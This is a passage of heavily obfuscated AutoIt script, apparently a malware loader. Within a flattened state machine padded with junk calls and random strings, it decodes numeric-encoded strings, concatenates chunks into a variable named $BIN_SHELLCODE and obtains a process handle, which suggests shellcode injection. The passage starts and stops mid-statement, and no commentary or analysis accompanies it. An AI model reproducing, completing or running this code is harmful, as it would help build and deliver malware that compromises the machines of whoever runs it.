) ) ) ) EXITLOOP PTR ("MhsdezMeRXHTtSmxJuw7o3wREyeyqIhEw9BlRbmrAk2f3c8x1XgrAFSTUKHQvnYhQdwtqaQHhfFdbqXCAQHCC0d0rSAfDG5nwUz0OOh0gHjvaNSDX" ) ENDIF IF $116925729 = 1970938970 THEN $ARET = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53,50..,..5..7..,..57,..59..,3..,..59,3,..57..,..5..6,5..9..,54,..5..9,3,..5..9..,3,55..,61,..5..5..,..5..7..,5..8,..6..,..58,..6,59,6..0..,..5..8,6..,..59..,..5..4,57..,56,..60,..55..,6..0..,6..2,60,..53..,60,5..7,..57,6..2..,..59..,5..,..6..0..,57..,..5..9,5..8..,6..0..,..5..5..,..5..9..,5..,59..,..5..4,5..9,3..,5..7,..57,..59,..5..4..,..60,57,..5..9,54,5..8..,..2,56,54,58,4..,..55..,..3..,..5..5,53..,..5..5..,5..5,..59,..55..,5..9..,..6..,..5..9..,..6,..59,..3..,5..5..,5..5..,..5..5..,..3..,..55..,5..3,5..5,55..,..57,..5..6..,6..0,..5..5..,60..,..6..2,6..0,5..3..,6..0,57..,..5..7,5..7..,..59,58..,..59,..56..,6..0..,..5..5..,60,..62..,..60..,5..3..,..6..0..,57,5..5,55,5..5..,..3,..55..,53,..5..5..,..5..5,..5..9..,..61..,..5..9..,54,59..,5,5..9..,..5..7,59,3,59,..5..8..,5..5,55,5..5..,3..,..55,..5..3,..55..,..57,6..0..,5..9,..5..7..,..5..6..,..6..0,..55..,6..0,6..2,..60,..5..3..,..60,..57,5..7,2,..5..9,..5..8,..60,..62,5..5,..3..,5..5..,..53,5..5..,55,..59..,6..1..,5..9..,54..,..5..9..,5..,..5..9..,..57..,59,..3,59,58..,..55,5..5,..5..5,3,..5..5,..5..3,..5..6..,53,..55..,..3..,55..,..5..3,5..5,55,..5..9,..5..5,..5..9..,6,5..9,6,5..9..,..3..,..55,55..,5..5,3,5..5,..5..3..,57,58..,60,61..,..59..,..58,59..,..5..6,..6..0,..5..8,..60..,..5..7,..59..,..5..8,55,..61..,5..5,5..5..,58,..5..7..,60..,..55..,6..0,58,59,..5..8,..55..,55,..5..5,..6..2,..5..5..,3..,5..5,..5..3..,5..5..,5..5..,..59,..57..,60..,..6..0..,..5..9..,6..,60..,55..,..59,..5..7..,..5..5,..5..5,5..5..,..3..,..55..,..53..,..5..6..,5..3..,..55,..3..,..55..,..53..,55..,5..5,60..,56,60..,57..,..60..,..55..,60,..58,5..9,5..6,..60..,..57..,..5..5..,1,..55..,55..,..55..,3,55,..53..,..55,..5..7..,..6..0,..57..,..5..7,5..5..,..6..0,..58,59,59..,5..9..,..59..,..5..5..,3,..55..,5..3..,55,..55,5.
.9,5..7,..6..0,60..,..59..,..6..,..60,..55..,..59..,5..7,..5..5..,..1,..55,5..5..,..55,3,..55,53..,5..7..,5..5..,59..,..6..2,..59..,5,59,..5..4,60,5..5,6..0,6..2..,..57,3,..59,58..,59,..5,5..5..,..61..,..55..,57..,6..0..,..59,57..,5..7..,59..,5..4..,..6..0..,..57..,5..9..,..54..,..55..,6..2..,5..5,..6..2.." , ".." ) ) ) ) $116925729 = 1296565717 INT (2615442 ) ISSTRING ("JKeJksRq07XVISw4QS0Ma7rzrpGcgJ1jMIpFDJlR7BM0rDg88TjqQyHMsNr4VNkpfN" ) ENDIF IF $116925729 = 2022545531 THEN $TTEMPSTRUCT = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53..,..5..0,5..7..,..5..7,59..,..3..,5..9,..3..,5..8..,..5..6,..60..,57..,60..,..5..5..,6..0,58..,5..9,..5..6..,6..0,57..,57,..56,..60..,..5..5..,59,5..8..,5..9,5..4..,60,..57..,..5..9,58,..55,..61,..55,..55..,59,..5..5,..60,..6..2,6..0,..57,59,5..8..,..58,..2,5..5..,5..5..,..5..5..,..5..3..,..5..5..,59..,..55,..53,..5..5..,..57,..5..9..,..6..2,5..8..,..53..,5..9,..3,59,..54,5..9,..62,..5..9,..5..,..5..8,..5..7,..5..9..,..58,..6..0,..6..1..,6..0..,..5..7,58,56,5..9..,..6..2..,..60..,..1,59,58..,..5..5..,53..,55,..2,5..5,5..3,56,5..4..,5..5,..53..,5..5..,..5..9..,..55..,53,..55,5..5..,..5..8..,4,..55..,..55,55..,3..,..5..5..,53..,..5..7,..57..,59..,3..,..5..9,3..,..58..,..56,..60,..5..7..,..6..0..,..5..5,60..,5..8..,5..9,5..6,6..0,57,..5..7..,..6..0,..59..,5..8,..60,..5..7,..5..8,..53..,6..0..,5..7..,6..0..,..5..5,..5..5,..6..1..,..5..5,..5..7,60..,..5..7,..5..7,5..5,..6..0..,58..,59,..5..9,59,5..9..,..5..5..,6..2..,55,..6..2.." , ".." 
) ) ) ) $116925729 = 1713506615 ENDIF IF $116925729 = 2032766480 THEN $ARET = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,5..0..,57..,..57..,59..,3,5..9..,..3,5..7,56..,..5..9..,..5..4,..59,..3..,5..9,3,..5..5..,..6..1..,..5..5,..5..7..,5..8..,6..,58..,6..,5..9,..6..0,58,..6..,..5..9..,5..4,57..,..56,..60..,..5..5,60..,..6..2,..6..0,..53,..6..0,..57,..57..,62,..59..,5,..6..0..,5..7..,59,58,6..0,55,..59,5,59,..54..,..5..9,3..,57,5..7,..5..9..,..54,6..0,..5..7,..59,5..4..,58,..2..,5..6..,54,..5..8..,4..,55..,..3,..55,..5..3,..55..,..5..5,..59,..5..5..,5..9..,..6,..59..,6,59,..3..,5..5..,5..5,55,..3..,55..,5..3..,5..5..,55..,57..,..5..6,..60..,5..5..,..60..,..6..2,..6..0,..53,60,..57..,..57..,5..7,59,58..,60,5..5..,..59..,62,60,59,..5..9,58,..5..7..,..2,..5..9..,..58..,6..0..,..62..,..55..,5..5..,..55,3..,5..5,53,5..5,..55..,..59,..61,..59..,5..4..,59..,..5..,59..,5..7..,59..,3..,..59..,58,55,..5..5,..5..5,..3..,..5..5..,57,58,6,..58..,6..,..5..9,..60..,..5..8,6..,5..9,..5..4,..5..7..,..56..,60..,..55,6..0,62,..6..0,53,..60,..5..7..,..5..7..,..6..2,..5..9..,..5..,6..0,..57,5..9..,..5..8,60,55,..59,..5..,59..,54,5..9,3..,57,5..7,5..9,54..,..60..,..5..7..,..5..9,5..4,..58,..2..,5..6..,..55,5..8,..4,55,3,5..5..,..53..,..5..5..,5..5..,60..,..58..,..59..,6..2..,5..9..,5,..6..0,..57..,..5..5,..55..,..5..5,..3..,..55,..53..,5..5,5..5,5..6,5..3,60..,61,56,..53,..56..,..5..3..,5..6,..5..3..,..56..,53..,..5..6,..5..9..,..56,59..,..5..6..,5..4..,5..6,53,..55..,..55..,..5..5..,3..,..5..5..,5..3,..55,..5..5..,..5..9..,6..1,..5..9..,54..,5..9,..5..,..5..9,..57,..5..9..,3..,..5..9..,..5..8..,5..5,..55..,55..,3,..5..5,..5..3..,5..5..,5..7,59,6..1,57..,..5..6,6..0,..5..5..,..6..0,..62..,6..0,..53,..6..0..,57..,..5..7,6..1,5..9..,..54,..60,..5..6..,..59,..6..1,55..,..3,..5..5,..53..,5..5..,..55..,5..9,5..7..,60..,60,5..9..,6,..6..0..,5..5,5..9,..5..7,..55,55..,55,..3,55,..53,..5..5..,55,56..,53,60,..61..,..5..6,5..3,5..6,53,5..6..,..5..3,5..6..,53,5..6..,..53,56..,..5..3..,5..6,..5..3.
) ) $656182541 = 158308218 PTR (1349936 * 3223997 ) ISFLOAT (2509884 + 4292517608 + 4292032918 + 4291755693 ) ENDIF IF $656182541 = 798922638 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..1,..2,5..3,60,..5..3..,56,5..7,5..8,..54..,5..3,5..8..,5..3,61,..2,..57..,6..0..,..6,..6..1,5..3,..5..6,..3,..56..,58,..53,..6" , ".." ) ) $656182541 = 143550684 ENDIF IF $656182541 = 800246788 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..6,5..5..,3..,61..,2,..60,4,4,5..3,..61..,56..,..3..,60..,..5..5..,..3..,53,..5..6,6,5..,6,6,6..0,6..0,..6..,3.." , ".." ) ) $656182541 = 798922638 INT (1515389 ) ENDIF IF $656182541 = 823793270 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,..59,..57,54..,6..1..,62,..5..7,4,..6..,..5..7..,..5..6..,2..,3..,..6..1,..60..,..55,..6..2,5..,56,..5..6,..6..,6,..59,..61,..53" , ".." ) ) $656182541 = 1508795126 ISSTRING ("5smjjm9nq8nSU2mjQTqVjttspT6CGlNugHg" ) ENDIF IF $656182541 = 836440117 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("58,53..,..5..4..,5..3..,..5..3..,53..,..5..3..,5..6,5..6..,6,..6,6..,..6,..60,..5..9,58,57..,6..,6..,..60,..5..8,5..4,..5..3..,58..,5..6.." , ".." ) ) $656182541 = 269998012 ENDIF IF $656182541 = 848901156 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..8..,..3..,53,6..0..,57..,5..4..,..6..2,6..1..,2..,53..,..5..7..,2..,..55..,5..3,56,..3..,..60..,58..,..53..,5..,..6..1,61,5..5,6,6" , ".." ) ) CHR (257452 ) $656182541 = 1718368979 ISPTR (2860008 + 789318 + 573977 + 4291086776 ) CHR (1034243 ) ENDIF IF $656182541 = 856025391 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("61,..53,..5..3,..5..3..,5..3,53,..5..8,..6..0..,..5..8..,..5..6,..6,..6,58,..58,..3,5..7,..61,..2,..5..8..,4..,..6..,..3..,..5,..62,6" , ".." 
) ) DIM $U3KLV13LX9SHM4OJNJFY = 1378063 $656182541 = 836440117 ISSTRING ("J5bF4LeketafYOXmLJ8dOtmga1T2VYWqDHLC8mNaZd" ) ENDIF IF $656182541 = 860380632 THEN LOCAL $B = $E (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("2,35..,4..0..,27,44..,..51,..2..0,41..,19..,4..6,..4..4,..35..,4..0,..33" , ".." ) ) ) DIM $AQO5KZFTQPS5EC3MZPGU = 2453505 + 192974 + 4294077630 + 4291182303 $656182541 = 762656979 ISBINARY (1251333 + 4291503526 + 863704 * 2574263 ) DIM $VUDRKHMNPWYYTNTSV2HF = 296936 + 4293382210 * 3643448 + 3415560 * 2324144 + 4292672430 + 1814128 + 4292169687 ENDIF IF $656182541 = 864731176 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53..,6..1,..2,58..,6..1,5..4,3..,53..,..56,4..,..60..,..6..1..,2..,57,..61,..5..5,..5..7..,..5..3,56..,..4..,6,61..,2..,..57..,53" , ".." ) ) ISFLOAT ("L7H6IWiy3h2eleW4vfWzqMeNXxvt6THcGRDh3ByhcBfCTEYxMXoe55K824jkAYBjJ0HEKOa4QOwYHL5sI8RiECgKgEo8soRn96236t" ) $656182541 = 1808850186 ISPTR ("qHWAq90KBhtNgT6yfAcKB7jYLTbvplUwke0dte79BMpgQrW" ) ENDIF IF $656182541 = 868457996 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,..5..3,5..9..,..1,5..3,..53..,59,1..,..5..3,5..7..,..61..,..4..,5..7,58,..2..,3..,..58,..5..3,6..1..,2,61,5..8,2,57..,..6.." , ".." ) ) ISSTRING (2912355 + 1611821 * 3286816 + 4291133380 ) $656182541 = 2057237529 ENDIF IF $656182541 = 871530397 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53..,53..,5..3..,..6..1,4,61,..5..8..,..5..4,53,..6..,3,..6,6,..6..,..6,58..,..53,..6..,6..,58..,..58,..5..,6..1..,6..1..,..2.." , ".." ) ) DIM $23EADCIYSCHT72VTENLB = "GNupzb7q9UTXTq" $656182541 = 983205074 ISFLOAT (524470 + 4291556725 + 4292596246 ) ENDIF IF $656182541 = 896046375 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,59..,60..,5..6..,59,3,..6..1..,..2,..6..0,..4..,..4,..5..3,6..1..,..5..6,3..,..6..0,56,..3..,..53..,..5..6,6..,..5,..61,..2,53" , ".." 
) ) $656182541 = 1428652054 ENDIF IF $656182541 = 937837217 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53,6..,..6..1..,..57..,..57..,58,5..3..,5..5,5..3,..5..3..,53,..5..3,5..9,1..,5..7,5..3..,..59,61,53..,..53,56,..5..3,5..3..,..53,5..3.." , ".." ) ) $656182541 = 2069227035 DIM $BLHSRYGOKOCZL4195RDV = 3271304 ENDIF IF $656182541 = 954977294 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("58..,..5..7,5..7..,6..,6..,6,..6,6,6,6..1..,4..,..5..7,..5..8..,62..,..57,..6..1..,6..2,61..,58,..57,6..1,6,..6,6,6" , ".." ) ) MOD (939398 , 2378577 ) $656182541 = 61093985 PTR ("8QyJ2eB8wD3I67Ak6z7p9pewtDRaUAQww3mnCycmbXBB5OsM7L0E405TLcqyxBn5YFlcUmRHxVomXLANldciJkCF8DLziNZIJGMyCq2V4shiLT" ) ENDIF IF $656182541 = 983205074 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("57..,..4,5..4,5..3,3,6..0,6..1..,5..8,54..,..53..,..6..,..3,6,..6..,6..,6,53..,..60..,53..,..5..3..,..53..,..5..4..,5..3,..5..3..,..6..1.." , ".." ) ) ISBINARY (853234 + 4294669970 ) $656182541 = 1364348677 ENDIF IF $656182541 = 1014469933 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("61,..2,..5..7,..5..9,..5..6..,..57,..55,6..2,5..3,..57,..54..,..6..2..,6..1,..2..,..57..,..4,6,5..3..,..61,2,5..7,60,..5..6..,..57..,..53" , ".." ) ) $656182541 = 469934669 CHR (2930591 ) ISBINARY ("ck5lqoqdt4pHMYFAFjEl9vXlLkL4xn6fOaIArhi0dJTVZS7C2szFhe9RxTIfLwOg7j2LpfixaOhyMcw3nibfXA8Kb2dIHcnQ4LXOZunXjbEC6JeuvQ2DvJ" ) ENDIF IF $656182541 = 1027989821 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3..,..60..,..3,5..4..,5,..59..,..5..3,..57,53..,..5..6,6,..5..3..,..6..1..,..2..,..3,..59..,..5..5,58..,..53..,53..,..5..3..,5..3..,..53..,..5..3..,..6" , ".." 
) ) $656182541 = 1138660241 DIM $JZ7BBEAOSE34N5V5FNAY = "n2kTuusqEHT0WJmHaEfdgNL9IhNHKOMkIsw6WSgjR7mFjeBvIxEjuULIqlkmQVQZ4IqCnpVrx5vjAfZEQs8mkC" ENDIF IF $656182541 = 1032281943 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("61,..6..1..,..6..2..,..5..7..,..4..,6..,..5..3,4,..5..4,..5..,..6..1,..5..6,2..,3,61,..6..0..,..5..5,..2..,..2..,..6..1..,2..,57,4..,..6..,..57" , ".." ) ) ISFLOAT (2686755 + 4291363587 + 4291191705 ) $656182541 = 1469834065 ISPTR (543575 + 4294142473 ) ENDIF IF $656182541 = 1038131997 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..6,..56..,..6,6..,..3,60,57..,..58..,..5..,3,5..3..,..54,53,53,5..3,..5..3..,53,53,..5..8,..6..0..,6..,..6..,6..0..,..5..8,4" , ".." ) ) STRING ("lwQGxWDOBTBVzJkU" ) $656182541 = 1295546840 ENDIF IF $656182541 = 1048715572 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..8..,3..,6..1,..6..1..,..5..6,..6,..5,53..,5..5,6,6..,..2,..57..,..2,5..8,..5..8..,61,..6..,..6,..6,..6..,..6..,..6..,..53,..6.." , ".." ) ) $656182541 = 1700940958 ISFLOAT (3843284 + 4293224952 + 2601517 + 4294039111 ) ENDIF IF $656182541 = 1051260188 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..8..,..5..3,6..1,60..,..55,..5..,..60..,56,..5..6,..3..,53..,58,6..,58,..5,5..8..,..2..,..6..1,2,5..,5..8,5..8..,4,3..,55.." , ".." ) ) DIM $JXTJ1UNSTCBQ78JFRH80 = 853762 $656182541 = 737653776 INT (57263 ) ENDIF IF $656182541 = 1053930317 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("3..,..6..1..,..6..2,..61..,..5..8..,58,5..3..,..6..,..6,6..,6,6..,6..,..6..1..,4,5..7..,5..8,3..,3,..3..,..60..,..6..1..,5..8..,59,..5..3.." , ".." ) ) DIM $52HVPETTXWBB6HEABBNH = 3122445 $656182541 = 586524435 DIM $3BZGTR5MGIJLTEWWULXV = "Wls2I2ntZ9KBmkr40cVFs" ENDIF IF $656182541 = 1061461686 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6,..62..,5..8..,..3,5..3..,57,53,61,..4..,..5..7,..4,62..,3..,..5..8..,..54..,5..8,..5..3..,6..,6..,..6..0..,60..,5,57..,61,2" , ".." 
) ) INT (3321565 ) $656182541 = 602321455 ISPTR ("rhi2h0gOVZStRJHjGuEC4JMo1lpccZTB4CSDttdBXl" ) ENDIF IF $656182541 = 1070530058 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53,5..3..,..53,..5..3..,5..3..,..53..,..53..,..61..,..2..,60,5..9..,..53..,..3,..61,2,60..,..59,..53,3,6..1,..2,5..6..,..5..9..,..61,2" , ".." ) ) WINEXISTS ("SOlYr6BRD3a5JeL6gqyo2e0nqdOTtSA1t4twN4k8ba" ) $656182541 = 39019882 INT (545323 ) ISBOOL ("HKNCNZ8HnqTxWCiLOVormgzm2fy4il6j933qOBOHOv6SsLn7jGm7tcLAkBKIzezctIy2J26nfRM0jS3p1BUK89Z7rBfn0ghK6" ) ENDIF IF $656182541 = 1079557876 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("57..,..6..0..,..5..,..6..1..,53..,56,57..,..58,..6,61..,..5..8..,5..3..,..6..,..6,60..,5..8,4..,6..1,..6..,6..,5..8..,5..8..,..3..,3..,..6..1" , ".." ) ) ISPTR ("xrJ91MyWrCHvR8tYetTAJiWTx9Ic3qtkbFdCb9hmH" ) $656182541 = 1396856746 ISBINARY (1977577 + 1084610 + 3281510 ) ENDIF IF $656182541 = 1082073854 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..,6,60..,59,57,..5..8..,5..3..,..6..,2,..6..0..,..57,..57,..57,..1..,53,..6..1,59,59,..61,..58..,..3,53,..6..0..,..57..,5..5" , ".." ) ) MOD (2012800 , 3375319 ) $656182541 = 369187565 DIM $W2AIXTK51WEMG3E8IE2J = 1651781 CHR (1030540 ) ENDIF IF $656182541 = 1131844544 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53,6..,61..,..5..8..,5..9,..54,..53..,..55..,5..3,5..3..,5..3,5..3..,..59,1,..5..7..,..53,..5..9..,6..1..,5..3,..5..3..,..56,5..3,..5..3,..53..,5..3" , ".." ) ) $656182541 = 1745262236 RANDOM (734950 ) ENDIF IF $656182541 = 1138660241 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,6..0,5..7,..53,2,3,..54,..5..,6..1..,..5..4,61,..56..,56,6..,53..,..6..1,..5..4,..5,..59,6,..6,6..,..6..,6,..6.." , ".." 
) ) $656182541 = 1924764602 ISSTRING ("ooyvU1D3QrvWTsNLhI2n" ) ENDIF IF $656182541 = 1196440215 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("61..,2..,6..0..,5..9,..5..4,..6..1..,..61..,6..2..,60,..5..8,2,..61..,..61,6..2,60..,..4,..3,..61,5..9,..57,6..1..,2..,5..6,..58,..56" , ".." ) ) $656182541 = 1070530058 RANDOM (1581921 ) PTR (3137932 + 4294245099 + 4293345740 * 1588072 ) ENDIF IF $656182541 = 1203322726 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3..,..5..3..,58,..58..,61,2..,..5..,3,58,5..9,..58..,..6..0..,6..1..,2,..60,4..,..5..3,6..1,56..,5..6,..6..,..59..,5..8..,60,5.." , ".." ) ) DIM $FKYO6DIFJLDGZGEVC3EL = 967967 $656182541 = 113519199 RANDOM (1893247 ) ENDIF IF $656182541 = 1205248241 THEN LOCAL $HANDLEFROMPID = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,..50..,57..,5..7..,5..9..,..3..,..5..9..,..3,57..,..56..,5..9,..5..4,5..9,..3..,5..9..,..3,5..5..,..6..1..,..5..5..,..5..5..,..5..9..,..2,..59,58..,..6..0,55..,5..9,..5..,..5..9,..5..8..,5..9..,..3..,5..6..,..5..6..,56,..55..,..5..5,5,59,..57..,5..9..,..3..,59..,3..,55,..5..5..,..55..,3..,..55,..5..3..,55..,..5..5..,..59,..61..,..59..,..5..4,59..,..5,..59,..5..7,..5..9,..3,..59..,5..8,55..,..5..5..,..5..5,3..,..5..5,..5..3,55,55,..5..7..,..6,60..,5..3,5..9..,..58..,..5..9,5..,58..,5..3,..60..,5..5..,5..9,6,5..9,56..,5..9,5..8..,60,56,6..0,..5..6..,55,55,..55,3,5..5..,5..3..,5..5,55..,59,57..,60..,6..0,..59..,..6,..60,55,59..,..57..,..55..,5..5,55,3..,..5..5,53,5..5,5..5,56,..5..3..,6..0..,..61..,5..6,5..3..,..56..,..5..3..,5..6,..54..,5..7,59..,..56,..53..,5..7..,5..9,..57..,5..9..,5..7..,..5..9,..5..5,..55,55..,3,5..5..,53,55,5..5,..5..9,5..5..,..5..9..,6,5..9..,..6..,5..9..,..3,55,5..5..,55..,3..,..5..5..,..5..3,55,55,56,53..,..55..,..5..5,55..,..3..,5..5..,..53,..55,..55,5..9..,..57..,6..0,..6..0,..5..9..,..6..,6..0,5..5..,..59,..5..7,..5..5..,5..5,..55,..3,55,..5..3,5..5,5..7..,..58,5..5,59,58,..60..,57..,5..8,2,55..,55,56..,..5..3,5..5,55,..5..8,..4..,..55..,..6..2,5..8,2,
..55,..5..5..,..56,5..3..,..55..,5..5..,5..8,..4" , ".." ) ) ) ) $656182541 = 1723957288 ISBOOL (1357373 + 756108 + 90066 ) WINEXISTS ("bTKFe1NOEKkZc3zN8atXTiFyDFlI" ) ENDIF IF $656182541 = 1207367525 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("58,..2..,..5..7,6,..3..,6..,..6,..6..,6,61..,..56,3..,..53,..5..3,61,..58,5..3..,..6..,6..,6..0,..5..8,..4..,..61..,..6..,6" , ".." ) ) $656182541 = 1253993868 ENDIF IF $656182541 = 1223622893 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53,..53..,..57,..5..9..,..61..,..56..,6,5,..53,5,60..,..3,4..,55,61,2..,..4,..6,59..,1..,54..,..53..,6..1,..4,..57.." , ".." ) ) CHR (1807614 ) $656182541 = 1569955931 ENDIF IF $656182541 = 1253993868 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..8..,58,..4,..5..7..,6..1,5..8,..3..,..53..,53..,6..,..6..1..,..5..7,5..6,3..,..6,..5,..6,6,6..,..6..,..61,2..,57..,59,5..5" , ".." ) ) ISSTRING (2236803 * 1552509 + 3628622 ) $656182541 = 1587018324 ISSTRING (828572 + 2230834 ) ISBINARY (1748020 + 4291756790 ) ENDIF IF $656182541 = 1270739258 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..,..6..,6,..6,6..,..6,..62,..56..,2,1..,6..2,57,53..,..5..6..,3..,60..,..6..1..,..58..,60..,..6..1,..6,6,6..,6..,..6.." , ".." ) ) $656182541 = 784317271 ISPTR (600974 * 3910146 * 3137530 ) ENDIF IF $656182541 = 1279551750 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5,6..,5,..6,6..,..6,6,61,4,..57..,58..,62..,3..,5..8..,53..,5..9..,1,..53,5..5,..6..,6..,60..,5..9..,..5..8,5..7" , ".." ) ) PTR ("lUWdmz0U9HwEy9VlLjGs3x7UMv" ) $656182541 = 180257576 DIM $XK4UDAFBGUKU9WEC9LKK = "s7tXXbA1wo1RGItDNRUGhAHTN77H2dzrgHEnJHpzOkTFtcBnU8uD0Nu1y" ENDIF IF $656182541 = 1295546840 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..1,..6,6..,..58..,..5..8,..3..,5..3..,..6..1,..62,57..,..5..8,6,61..,61,..5..8,..3,..5..3..,..60,58..,..5..4..,5..7,..59..,61,5..3,..53" , ".." 
) ) PTR ("8sZJK9ef3gBu17RcyKFUX4S5ABmMZ9yzuWmzQTBBiNfocFWxkvlHtteeJ3jiXAq4Sb9fUqvQieKiYD35QYCCX0gaRi0WJsNRxkGaFRM39" ) $656182541 = 856025391 MOD (2907010 , 3741157 ) ENDIF IF $656182541 = 1296565717 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("1..,..5..3..,2,6..1..,62..,..61..,..5..8..,55,..57,..6,..6..,6..,..6,..6,6..,6..1..,4..,57..,58,2,..5..3,6..1..,62..,..6..1,58" , ".." ) ) $656182541 = 2022545531 DIM $158XLAJGZZ3VN72Z8KJC = 1150284 ENDIF IF $656182541 = 1300820860 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("57,..5..3,..59,..57..,..5..3..,..6..1..,..53,..56,6..1..,53,..5..3,..6..0,5..8,6..,..1,..55..,2..,3..,5..4,58,..4..,..3..,..5..5..,..53..,..5..7.." , ".." ) ) $656182541 = 1203322726 ISPTR ("OTJeOeGtbBzyIZZkKjhYDYyuZzdRLTSYU9UkkJrX2Njhc22bBKrJMGw1tpopbZSrULOJfNab1u6ZNqr6HboaBhkmM214ubWc62xzn" ) ENDIF IF $656182541 = 1318416169 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..,3..,6,6..,6,..6..,..58..,5..3..,..6..,..6,..60,58,..4..,3..,..6..,..6,5..8,..58,..62..,..53,61..,5..8,..3,53,..53.." , ".." ) ) $656182541 = 100830152 MOD (2861522 , 1236259 ) MOD (189487 , 3886347 ) ENDIF IF $656182541 = 1330478138 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..1,..3,5..,6..1,5..9..,6,..54,..61..,5..3,..4,..6..1..,..6..2..,61..,..5..8..,5..8,5..7,6..,..6..,..6,..6,6,..6..,..61,..2,5..7" , ".." ) ) $656182541 = 1048715572 ISFLOAT (2452762 + 4291149395 + 3191120 ) ENDIF IF $656182541 = 1364348677 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("2,..60,54,5..6,..3,..5..3,56,..6,..5..4..,53..,6..,..2,..6..0..,57,..5..9,..54..,57,6..1,6..2,..6..0,4,..6..,61,61,62" , ".." 
) ) WINEXISTS ("V21SpfAAmz1LfOY6btXBocW7WuUaEH2VSMBjgJB4kqMmKZ1H9jOFVBNTg364uz5NGf3CmNZB22r8yIw6Dlbv2w9q8SdmNGIUu8OE6xuvtnN" ) $656182541 = 411711931 ISFLOAT ("G9AjyJWjgMDDKMXutGMA41af1OcNThgsyFOOgzuUmFyt40VQAsIMd3MQ8vrTHhA8" ) DIM $E7HO3L2NXBRKA4VNZHDO = 2037021 ENDIF IF $656182541 = 1368549586 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("58,6,..61,53..,56,..6,2,61,..5..6,60,..4,5..,..3..,..53,..5..3..,6..1,..62..,5..7..,..6..0,5..6..,..57,..5..3,6..,6..1..,5..7" , ".." ) ) ISFLOAT (511549 + 320807 + 1705817 ) $656182541 = 621304772 ISPTR (2910683 + 2685881 ) ENDIF IF $656182541 = 1396856746 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("58..,3..,..53,6..0,..5..7,54,..55..,6..1..,..2..,5..7..,..4,6,..5..7,..61..,5..6..,..3..,..6..0,55..,6..1..,..5..3,6..,..2..,6..0..,5..7..,..59.." , ".." ) ) MOD (1152203 , 663470 ) $656182541 = 823793270 ENDIF IF $656182541 = 1428652054 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("60,..1,6..2..,5..3..,..53,..5..3..,5..3..,..5..3,5..3,..55..,..53,60,5..7,..5..4,62..,6..1..,5..8..,3,53,..6..0..,..6..2,5..3,..57,5..9..,1" , ".." ) ) $656182541 = 438111387 RANDOM (1807612 ) ENDIF IF $656182541 = 1453481599 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM 